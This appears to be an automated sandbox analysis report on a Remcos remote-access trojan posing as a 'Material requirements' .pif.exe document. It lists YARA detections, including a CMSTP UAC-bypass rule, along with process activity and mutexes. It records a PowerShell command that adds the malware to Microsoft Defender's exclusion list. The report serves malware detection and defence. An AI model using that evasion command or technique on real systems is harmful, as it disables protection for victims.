                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                .NET source code contains very large array initializations
                Source: 0.2.Material requirements_1.pif.exe.70b0000.4.raw.unpack, .csLarge array initialization: : array initializer size 37142
                Source: 0.2.Material requirements_1.pif.exe.2d94fd0.0.raw.unpack, .csLarge array initialization: : array initializer size 37142
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,7_2_004158B9
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.hJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.iniJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\WmiApRpl.hJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\WmiApRpl.iniJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\inf\WmiApRpl\0009\Jump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\PerfStringBackup.TMPJump to behavior
                Source: C:\Windows\System32\wbem\WMIADAP.exeFile deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.hJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_02D0D5BC0_2_02D0D5BC
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_04DA00400_2_04DA0040
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_04DA3DF00_2_04DA3DF0
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_05326F400_2_05326F40
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_0532782C0_2_0532782C
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_053200060_2_05320006
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_053200400_2_05320040
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_05326F1F0_2_05326F1F
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_05323F540_2_05323F54
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_071236980_2_07123698
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_071245480_2_07124548
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_071242100_2_07124210
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_071200400_2_07120040
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_07120F000_2_07120F00
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_0712F6500_2_0712F650
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_0712F6410_2_0712F641
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_0712368B0_2_0712368B
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_071255080_2_07125508
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_071245380_2_07124538
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_071254F80_2_071254F8
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_071242010_2_07124201
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_071232DB0_2_071232DB
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_071232E00_2_071232E0
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_071200060_2_07120006
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_071230700_2_07123070
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_071230800_2_07123080
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_0712DFA80_2_0712DFA8
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_07120E100_2_07120E10
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_07121E100_2_07121E10
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_07121E000_2_07121E00
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_07120D8A0_2_07120D8A
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_07126DD10_2_07126DD1
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_07126DE00_2_07126DE0
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_07122CD80_2_07122CD8
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_07122CC90_2_07122CC9
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_0712DB700_2_0712DB70
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 0_2_0712DB600_2_0712DB60
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004520E27_2_004520E2
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0041D0817_2_0041D081
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0043D0A87_2_0043D0A8
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004371607_2_00437160
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004361BA7_2_004361BA
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004262647_2_00426264
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004313877_2_00431387
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0043652C7_2_0043652C
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0041E5EF7_2_0041E5EF
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0044C7497_2_0044C749
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004367D67_2_004367D6
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_004267DB7_2_004267DB
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0043C9ED7_2_0043C9ED
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00432A597_2_00432A59
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00436A9D7_2_00436A9D
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0043CC1C7_2_0043CC1C
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00436D587_2_00436D58
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00434D327_2_00434D32
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0043CE4B7_2_0043CE4B
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00440E307_2_00440E30
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00426E837_2_00426E83
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00412F457_2_00412F45
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00452F107_2_00452F10
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00426FBD7_2_00426FBD
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: String function: 00401F66 appears 50 times
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: String function: 004020E7 appears 41 times
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: String function: 004338B5 appears 41 times
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: String function: 00433FC0 appears 55 times
                Source: Material requirements_1.pif.exe, 00000000.00000002.2091635478.0000000007430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Material requirements_1.pif.exe
                Source: Material requirements_1.pif.exe, 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Material requirements_1.pif.exe
                Source: Material requirements_1.pif.exe, 00000000.00000002.2084001859.0000000002D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFGMaker.dll2 vs Material requirements_1.pif.exe
                Source: Material requirements_1.pif.exe, 00000000.00000002.2082802234.00000000010DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Material requirements_1.pif.exe
                Source: Material requirements_1.pif.exe, 00000000.00000002.2091086276.00000000070B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFGMaker.dll2 vs Material requirements_1.pif.exe
                Source: Material requirements_1.pif.exeBinary or memory string: OriginalFilenameVpNo.exeD vs Material requirements_1.pif.exe
                Source: Material requirements_1.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Material requirements_1.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, EXjeaLC6h752HH7SeQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, EXjeaLC6h752HH7SeQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, HO6g8FnXFx6pGwv4w4.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, HO6g8FnXFx6pGwv4w4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, HO6g8FnXFx6pGwv4w4.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, HO6g8FnXFx6pGwv4w4.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, HO6g8FnXFx6pGwv4w4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, HO6g8FnXFx6pGwv4w4.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, HO6g8FnXFx6pGwv4w4.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, HO6g8FnXFx6pGwv4w4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, HO6g8FnXFx6pGwv4w4.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, EXjeaLC6h752HH7SeQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@11/16@0/1
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,7_2_00416AB7
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,7_2_0040E219
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,7_2_0041A64F
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeCode function: 7_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_00419BD4
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Material requirements_1.pif.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_03
                Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
                Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
                Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
                Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-0PJCBG
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0diqpim.ksk.ps1Jump to behavior
                Source: Material requirements_1.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Material requirements_1.pif.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Material requirements_1.pif.exeReversingLabs: Detection: 68%
                Source: Material requirements_1.pif.exeVirustotal: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeProcess created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: mscoree.dllJump to behavior
